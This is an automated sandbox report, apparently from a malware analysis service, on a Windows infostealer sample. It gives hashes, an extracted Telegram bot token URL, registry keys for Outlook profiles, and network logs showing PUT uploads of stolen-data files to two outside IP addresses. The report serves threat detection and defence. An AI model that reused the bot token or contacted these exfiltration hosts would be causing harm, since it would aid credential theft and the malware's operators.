Analysis
-
max time kernel
139s -
max time network
148s -
platform
windows10-2004_x64 -
resource
win10v2004-20240704-en -
resource tags
arch:x64arch:x86image:win10v2004-20240704-enlocale:en-usos:windows10-2004-x64system -
submitted
05/07/2024, 02:01 UTC
Behavioral task
behavioral1
Sample
fc01fb44a8341e4c46a9b6d6cda304779f3a3d848f4181fc224b7df4d69cf8c4.exe
Resource
win7-20240611-en
Behavioral task
behavioral2
Sample
fc01fb44a8341e4c46a9b6d6cda304779f3a3d848f4181fc224b7df4d69cf8c4.exe
Resource
win10v2004-20240704-en
General
-
Target
fc01fb44a8341e4c46a9b6d6cda304779f3a3d848f4181fc224b7df4d69cf8c4.exe
-
Size
90KB
-
MD5
44aa7d8622f1a0e08d3bdfa4de012a6d
-
SHA1
5f44b235650dfb7f83b3520365decabc8782bd9a
-
SHA256
fc01fb44a8341e4c46a9b6d6cda304779f3a3d848f4181fc224b7df4d69cf8c4
-
SHA512
e6a53d18d727f72ab0adb0a0b83cc53cffce99f730eee1da6d2e9a8efb3a588e950053ca0364c3050fb5b2cc905b0bb82365e299458e8def0daedb6954f81e3a
-
SSDEEP
1536:neFPHaclFeFO0XbyfQ9sqbS4p2JCaH+Qsjhp5c1Ym+MMRwX6jUR9bMFUxff9UNRE:gPlFeFO0XbyfQ9sqbS4UJzfsjL5mRXlL
Malware Config
Extracted
gurcu
https://api.telegram.org/bot5771174697:AAFFUd9U6oSAWikqmrv6ZbgE_rIoZtQSgEg/sendMessage?chat_id=-1001824413058
Signatures
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-1403246978-718555486-3105247137-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 fc01fb44a8341e4c46a9b6d6cda304779f3a3d848f4181fc224b7df4d69cf8c4.exe Key opened \REGISTRY\USER\S-1-5-21-1403246978-718555486-3105247137-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 fc01fb44a8341e4c46a9b6d6cda304779f3a3d848f4181fc224b7df4d69cf8c4.exe Key opened \REGISTRY\USER\S-1-5-21-1403246978-718555486-3105247137-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 fc01fb44a8341e4c46a9b6d6cda304779f3a3d848f4181fc224b7df4d69cf8c4.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 1 ip-api.com -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 2616 fc01fb44a8341e4c46a9b6d6cda304779f3a3d848f4181fc224b7df4d69cf8c4.exe 2616 fc01fb44a8341e4c46a9b6d6cda304779f3a3d848f4181fc224b7df4d69cf8c4.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2616 fc01fb44a8341e4c46a9b6d6cda304779f3a3d848f4181fc224b7df4d69cf8c4.exe -
outlook_office_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-1403246978-718555486-3105247137-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 fc01fb44a8341e4c46a9b6d6cda304779f3a3d848f4181fc224b7df4d69cf8c4.exe -
outlook_win_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-1403246978-718555486-3105247137-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 fc01fb44a8341e4c46a9b6d6cda304779f3a3d848f4181fc224b7df4d69cf8c4.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\fc01fb44a8341e4c46a9b6d6cda304779f3a3d848f4181fc224b7df4d69cf8c4.exe"C:\Users\Admin\AppData\Local\Temp\fc01fb44a8341e4c46a9b6d6cda304779f3a3d848f4181fc224b7df4d69cf8c4.exe"1⤵
- Accesses Microsoft Outlook profiles
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- outlook_office_path
- outlook_win_path
PID:2616
Network
-
Remote address:8.8.8.8:53Requestip-api.comIN AResponseip-api.comIN A208.95.112.1
-
GEThttp://ip-api.com/line?fields=query,countryfc01fb44a8341e4c46a9b6d6cda304779f3a3d848f4181fc224b7df4d69cf8c4.exeRemote address:208.95.112.1:80RequestGET /line?fields=query,country HTTP/1.1
Host: ip-api.com
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Content-Type: text/plain; charset=utf-8
Content-Length: 29
Access-Control-Allow-Origin: *
X-Ttl: 60
X-Rl: 44
-
Remote address:8.8.8.8:53Requestg.bing.comIN AResponseg.bing.comIN CNAMEg-bing-com.dual-a-0034.a-msedge.netg-bing-com.dual-a-0034.a-msedge.netIN CNAMEdual-a-0034.a-msedge.netdual-a-0034.a-msedge.netIN A13.107.21.237dual-a-0034.a-msedge.netIN A204.79.197.237
-
GEThttps://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=de9245bf86754c9e90dc37465139c805&localId=w:5BC0C033-2656-131B-E22B-41EC383E9388&deviceId=6966568097755002&anid=Remote address:13.107.21.237:443RequestGET /neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=de9245bf86754c9e90dc37465139c805&localId=w:5BC0C033-2656-131B-E22B-41EC383E9388&deviceId=6966568097755002&anid= HTTP/2.0
host: g.bing.com
accept-encoding: gzip, deflate
user-agent: WindowsShellClient/9.0.40929.0 (Windows)
ResponseHTTP/2.0 204
pragma: no-cache
expires: Fri, 01 Jan 1990 00:00:00 GMT
set-cookie: MUID=24A2E84D691663973F20FCFE68F6622D; domain=.bing.com; expires=Wed, 30-Jul-2025 06:26:19 GMT; path=/; SameSite=None; Secure; Priority=High;
strict-transport-security: max-age=31536000; includeSubDomains; preload
access-control-allow-origin: *
x-cache: CONFIG_NOCACHE
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 6D8336A44011425E9573AE3501566428 Ref B: LON04EDGE1005 Ref C: 2024-07-05T06:26:19Z
date: Fri, 05 Jul 2024 06:26:18 GMT
-
GEThttps://g.bing.com/neg/0?action=emptycreative&adUnitId=11730597&publisherId=251978541&rid=de9245bf86754c9e90dc37465139c805&localId=w:5BC0C033-2656-131B-E22B-41EC383E9388&deviceId=6966568097755002&anid=Remote address:13.107.21.237:443RequestGET /neg/0?action=emptycreative&adUnitId=11730597&publisherId=251978541&rid=de9245bf86754c9e90dc37465139c805&localId=w:5BC0C033-2656-131B-E22B-41EC383E9388&deviceId=6966568097755002&anid= HTTP/2.0
host: g.bing.com
accept-encoding: gzip, deflate
user-agent: WindowsShellClient/9.0.40929.0 (Windows)
cookie: MUID=24A2E84D691663973F20FCFE68F6622D
ResponseHTTP/2.0 204
pragma: no-cache
expires: Fri, 01 Jan 1990 00:00:00 GMT
set-cookie: MSPTC=YVsXQzKW3MuDYzpZdYZRXISk80_1ZPDr3E6QaUfr7HI; domain=.bing.com; expires=Wed, 30-Jul-2025 06:26:19 GMT; path=/; Partitioned; secure; SameSite=None
strict-transport-security: max-age=31536000; includeSubDomains; preload
access-control-allow-origin: *
x-cache: CONFIG_NOCACHE
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 4CB985B0B8CF44BC98C49CFD39D5B83E Ref B: LON04EDGE1005 Ref C: 2024-07-05T06:26:19Z
date: Fri, 05 Jul 2024 06:26:18 GMT
-
GEThttps://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=de9245bf86754c9e90dc37465139c805&localId=w:5BC0C033-2656-131B-E22B-41EC383E9388&deviceId=6966568097755002&anid=Remote address:13.107.21.237:443RequestGET /neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=de9245bf86754c9e90dc37465139c805&localId=w:5BC0C033-2656-131B-E22B-41EC383E9388&deviceId=6966568097755002&anid= HTTP/2.0
host: g.bing.com
accept-encoding: gzip, deflate
user-agent: WindowsShellClient/9.0.40929.0 (Windows)
cookie: MUID=24A2E84D691663973F20FCFE68F6622D; MSPTC=YVsXQzKW3MuDYzpZdYZRXISk80_1ZPDr3E6QaUfr7HI
ResponseHTTP/2.0 204
pragma: no-cache
expires: Fri, 01 Jan 1990 00:00:00 GMT
strict-transport-security: max-age=31536000; includeSubDomains; preload
access-control-allow-origin: *
x-cache: CONFIG_NOCACHE
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: CBE2E57E88ED4E679F76D47C8E92DFFB Ref B: LON04EDGE1005 Ref C: 2024-07-05T06:26:19Z
date: Fri, 05 Jul 2024 06:26:18 GMT
-
Remote address:8.8.8.8:53Request1.112.95.208.in-addr.arpaIN PTR
-
Remote address:8.8.8.8:53Request1.112.95.208.in-addr.arpaIN PTR
-
Remote address:8.8.8.8:53Request1.112.95.208.in-addr.arpaIN PTR
-
Remote address:8.8.8.8:53Request1.112.95.208.in-addr.arpaIN PTR
-
Remote address:8.8.8.8:53Request1.112.95.208.in-addr.arpaIN PTR
-
Remote address:8.8.8.8:53Request237.21.107.13.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request237.21.107.13.in-addr.arpaIN PTR
-
Remote address:8.8.8.8:53Request17.160.190.20.in-addr.arpaIN PTR
-
Remote address:8.8.8.8:53Request17.160.190.20.in-addr.arpaIN PTR
-
Remote address:8.8.8.8:53Request17.160.190.20.in-addr.arpaIN PTR
-
Remote address:8.8.8.8:53Request17.160.190.20.in-addr.arpaIN PTR
-
Remote address:8.8.8.8:53Request17.160.190.20.in-addr.arpaIN PTR
-
Remote address:8.8.8.8:53Request88.156.103.20.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request88.156.103.20.in-addr.arpaIN PTR
-
Remote address:8.8.8.8:53Request88.156.103.20.in-addr.arpaIN PTR
-
Remote address:8.8.8.8:53Request81.144.22.2.in-addr.arpaIN PTRResponse81.144.22.2.in-addr.arpaIN PTRa2-22-144-81deploystaticakamaitechnologiescom
-
Remote address:8.8.8.8:53Request22.236.111.52.in-addr.arpaIN PTRResponse
-
PUThttp://185.18.206.168:8080/fjWPH_Admin%40NQZRGKDO_report.wsrfc01fb44a8341e4c46a9b6d6cda304779f3a3d848f4181fc224b7df4d69cf8c4.exeRemote address:185.18.206.168:8080RequestPUT /fjWPH_Admin%40NQZRGKDO_report.wsr HTTP/1.1
Host: 185.18.206.168:8080
Content-Length: 577438
Expect: 100-continue
Connection: Keep-Alive
-
Remote address:8.8.8.8:53Request168.206.18.185.in-addr.arpaIN PTRResponse168.206.18.185.in-addr.arpaIN PTR168206 interhostnet
-
PUThttp://216.250.190.139/fjWPH_Admin%40NQZRGKDO_report.wsrfc01fb44a8341e4c46a9b6d6cda304779f3a3d848f4181fc224b7df4d69cf8c4.exeRemote address:216.250.190.139:80RequestPUT /fjWPH_Admin%40NQZRGKDO_report.wsr HTTP/1.1
Host: 216.250.190.139
Content-Length: 577438
Expect: 100-continue
Connection: Keep-Alive
ResponseHTTP/1.1 404 Not Found
Date: Fri, 05 Jul 2024 06:28:13 GMT
Content-Type: text/html
Content-Length: 153
Connection: keep-alive
-
Remote address:8.8.8.8:53Request139.190.250.216.in-addr.arpaIN PTRResponse139.190.250.216.in-addr.arpaIN PTRquarkiphousenet
-
Remote address:8.8.8.8:53Request139.190.250.216.in-addr.arpaIN PTR
-
208.95.112.1:80http://ip-api.com/line?fields=query,countryhttpfc01fb44a8341e4c46a9b6d6cda304779f3a3d848f4181fc224b7df4d69cf8c4.exe486 B 371 B 7 4
HTTP Request
GET http://ip-api.com/line?fields=query,countryHTTP Response
200 -
13.107.21.237:443https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=de9245bf86754c9e90dc37465139c805&localId=w:5BC0C033-2656-131B-E22B-41EC383E9388&deviceId=6966568097755002&anid=tls, http22.8kB 9.9kB 25 19
HTTP Request
GET https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=de9245bf86754c9e90dc37465139c805&localId=w:5BC0C033-2656-131B-E22B-41EC383E9388&deviceId=6966568097755002&anid=HTTP Response
204HTTP Request
GET https://g.bing.com/neg/0?action=emptycreative&adUnitId=11730597&publisherId=251978541&rid=de9245bf86754c9e90dc37465139c805&localId=w:5BC0C033-2656-131B-E22B-41EC383E9388&deviceId=6966568097755002&anid=HTTP Response
204HTTP Request
GET https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=de9245bf86754c9e90dc37465139c805&localId=w:5BC0C033-2656-131B-E22B-41EC383E9388&deviceId=6966568097755002&anid=HTTP Response
204 -
260 B 5
-
260 B 120 B 5 3
-
260 B 5
-
260 B 80 B 5 2
-
260 B 200 B 5 5
-
260 B 160 B 5 4
-
260 B 5
-
260 B 200 B 5 5
-
185.18.206.168:8080http://185.18.206.168:8080/fjWPH_Admin%40NQZRGKDO_report.wsrhttpfc01fb44a8341e4c46a9b6d6cda304779f3a3d848f4181fc224b7df4d69cf8c4.exe89.7kB 892 B 67 22
HTTP Request
PUT http://185.18.206.168:8080/fjWPH_Admin%40NQZRGKDO_report.wsr -
260 B 200 B 5 5
-
260 B 200 B 5 5
-
260 B 200 B 5 5
-
216.250.190.139:80http://216.250.190.139/fjWPH_Admin%40NQZRGKDO_report.wsrhttpfc01fb44a8341e4c46a9b6d6cda304779f3a3d848f4181fc224b7df4d69cf8c4.exe594.8kB 6.3kB 429 150
HTTP Request
PUT http://216.250.190.139/fjWPH_Admin%40NQZRGKDO_report.wsrHTTP Response
404 -
260 B 200 B 5 5
-
260 B 5
-
208 B 4
-
56 B 72 B 1 1
DNS Request
ip-api.com
DNS Response
208.95.112.1
-
56 B 151 B 1 1
DNS Request
g.bing.com
DNS Response
13.107.21.237204.79.197.237
-
355 B 5
DNS Request
1.112.95.208.in-addr.arpa
DNS Request
1.112.95.208.in-addr.arpa
DNS Request
1.112.95.208.in-addr.arpa
DNS Request
1.112.95.208.in-addr.arpa
DNS Request
1.112.95.208.in-addr.arpa
-
144 B 158 B 2 1
DNS Request
237.21.107.13.in-addr.arpa
DNS Request
237.21.107.13.in-addr.arpa
-
360 B 5
DNS Request
17.160.190.20.in-addr.arpa
DNS Request
17.160.190.20.in-addr.arpa
DNS Request
17.160.190.20.in-addr.arpa
DNS Request
17.160.190.20.in-addr.arpa
DNS Request
17.160.190.20.in-addr.arpa
-
216 B 158 B 3 1
DNS Request
88.156.103.20.in-addr.arpa
DNS Request
88.156.103.20.in-addr.arpa
DNS Request
88.156.103.20.in-addr.arpa
-
70 B 133 B 1 1
DNS Request
81.144.22.2.in-addr.arpa
-
72 B 158 B 1 1
DNS Request
22.236.111.52.in-addr.arpa
-
73 B 108 B 1 1
DNS Request
168.206.18.185.in-addr.arpa
-
148 B 105 B 2 1
DNS Request
139.190.250.216.in-addr.arpa
DNS Request
139.190.250.216.in-addr.arpa